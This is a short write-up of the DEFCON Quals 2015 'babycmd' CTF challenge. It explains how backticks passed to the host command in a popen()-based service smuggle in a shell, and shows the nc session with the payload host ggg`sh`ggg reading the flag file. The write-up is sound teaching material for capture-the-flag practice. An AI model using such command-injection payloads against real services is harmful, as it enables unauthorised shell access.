choppers

DEFCON Quals 2015: babycmd

2015-05-17 00:00:00

Description

Baby's First: 1 point
babycmd

babycmd_3ad28b10e8ab283d7df81795075f600b.quals.shallweplayaga.me:15491
[Download](http://downloads.notmalware.ru/babycmd_3ad28b10e8ab283d7df81795075f600b)

Analysis

$ md5sum babycmd
3ad28b10e8ab283d7df81795075f600b  babycmd
$ file babycmd
babycmd: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.24, stripped
$ execstack babycmd
- babycmd
$ ./babycmd

Welcome to another Baby's First Challenge!
Commands: ping, dig, host, exit
:

babycmd has 3 commands, ping, dig, and host. All of them are run through popen(). We just have to find one that will let us do a command line injection.

Exploit

The host command will let the "`" character through. This is used for command substitution in Bash. If sh is injected using the "`" character, we will get a shell, but we won't see any of the output until we exit the shell. Then the host process gets the output from sh and will output it in an error message.

$ nc babycmd_3ad28b10e8ab283d7df81795075f600b.quals.shallweplayaga.me 15491

Welcome to another Baby's First Challenge!
Commands: ping, dig, host, exit
: host ggg`sh`ggg
cat /home/babycmd/flag
exit
host: 'gggThe flag is: Pretty easy eh!!~ Now let's try something hArd3r, shallwe??ggg' is not in legal name syntax (label too long)
Commands: ping, dig, host, exit
: